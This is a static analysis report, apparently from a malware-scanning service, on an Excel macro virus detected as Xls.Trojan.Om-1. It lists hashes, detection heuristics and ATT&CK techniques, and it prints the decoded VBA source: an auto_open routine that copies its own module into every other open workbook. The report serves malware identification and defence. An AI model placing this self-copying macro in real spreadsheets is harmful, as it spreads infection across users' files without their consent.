Xls.Trojan.Om-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 63361817ddf310bb…

MALICIOUS

Office (OLE)

38.5 KB Created: 1999-02-08 09:24:15 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 5612cce9b5fea69c91f647e0fac71373 SHA-1: 600c5778d1d4d09a5cb380cffe68605b0bb7424c SHA-256: 63361817ddf310bbfb827ede190ade203f5f24b4801364a657a0d9ac18bfc12b
120 Risk Score

Malware Insights

Xls.Trojan.Om-1 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The file is an Excel spreadsheet containing a VBA macro that is automatically executed upon opening (Auto_Open). The macro attempts to copy itself to other open workbooks, suggesting a propagation or persistence mechanism. The ClamAV detection name 'Xls.Trojan.Om-1' strongly indicates its malicious nature and likely family.

Heuristics 3

  • ClamAV: Xls.Trojan.Om-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Om-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1828 bytes
SHA-256: 04878467d418487d18c8b6db22501095cfacfda74f097f633476474bbc321449
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "OMMacro"







Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
For Each classeur In Application.Workbooks
If classeur.Name <> "OM.XLS" Then
    om = False
    For Each Feuille In classeur.Sheets
        If Feuille.Name = "OMMacro" Then om = True
    Next Feuille
    If Not om Then
    apparent = Windows(classeur.Name).Visible
    Windows(classeur.Name).Visible = True
    ThisWorkbook.Modules("OMMacro").Copy after:=Workbooks(classeur.Name).Sheets(1)
    Windows(classeur.Name).Visible = apparent
    End If 'om
End If
Next classeur

End Sub